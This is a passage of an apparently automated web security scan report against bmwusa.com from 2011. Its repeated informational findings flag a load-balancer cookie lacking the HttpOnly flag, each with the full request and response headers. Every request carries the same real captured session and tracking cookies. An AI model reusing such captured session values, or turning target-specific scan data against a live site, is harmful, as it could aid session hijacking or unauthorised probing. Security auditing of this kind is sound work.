Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:46:31 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:06:31 GMT;path=/
Content-Length: 199802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.379. http://www.bmwusa.com/standard/content/vehicles/2011/x5/x5savexplorenew.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x5/x5savexplorenew.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:06:45 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x5/x5savexplorenew.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:46:45 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:06:45 GMT;path=/
Content-Length: 180315

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.380. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35d/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x5/xdrive35d/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:13:21 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x5/xdrive35d/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:53:21 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:13:21 GMT;path=/
Content-Length: 214470

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.381. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35d/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x5/xdrive35d/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:14:04 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x5/xdrive35d/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:54:04 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:14:04 GMT;path=/
Content-Length: 224849

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.382. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35d/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x5/xdrive35d/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:13:37 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x5/xdrive35d/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:53:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:13:37 GMT;path=/
Content-Length: 214642

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.383. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35d/x5seriessavmediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x5/xdrive35d/x5seriessavmediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:14:20 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x5/xdrive35d/x5seriessavmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:54:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:14:20 GMT;path=/
Content-Length: 202223

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.384. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35d/x5seriessavmediagallery.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x5/xdrive35d/x5seriessavmediagallery.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:13:42 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x5/xdrive35d/x5seriessavmediagallery.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:53:42 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:13:42 GMT;path=/
Content-Length: 202224

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.385. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35i/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x5/xdrive35i/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:06:55 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x5/xdrive35i/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:46:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:06:55 GMT;path=/
Content-Length: 214350

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.386. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35i/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x5/xdrive35i/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:07:24 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x5/xdrive35i/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:47:24 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:07:24 GMT;path=/
Content-Length: 222920

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.387. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35i/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x5/xdrive35i/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:07:08 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x5/xdrive35i/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:47:08 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:07:08 GMT;path=/
Content-Length: 211101

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.388. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35i/x5seriessavmediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x5/xdrive35i/x5seriessavmediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:07:12 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x5/xdrive35i/x5seriessavmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:47:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:07:12 GMT;path=/
Content-Length: 202179

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.389. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35ipremium/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x5/xdrive35ipremium/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:07:46 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x5/xdrive35ipremium/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:47:46 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:07:46 GMT;path=/
Content-Length: 214639

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.390. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35ipremium/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x5/xdrive35ipremium/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:10:01 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x5/xdrive35ipremium/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:50:01 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:10:01 GMT;path=/
Content-Length: 223773

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.391. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35ipremium/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x5/xdrive35ipremium/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:09:37 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x5/xdrive35ipremium/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
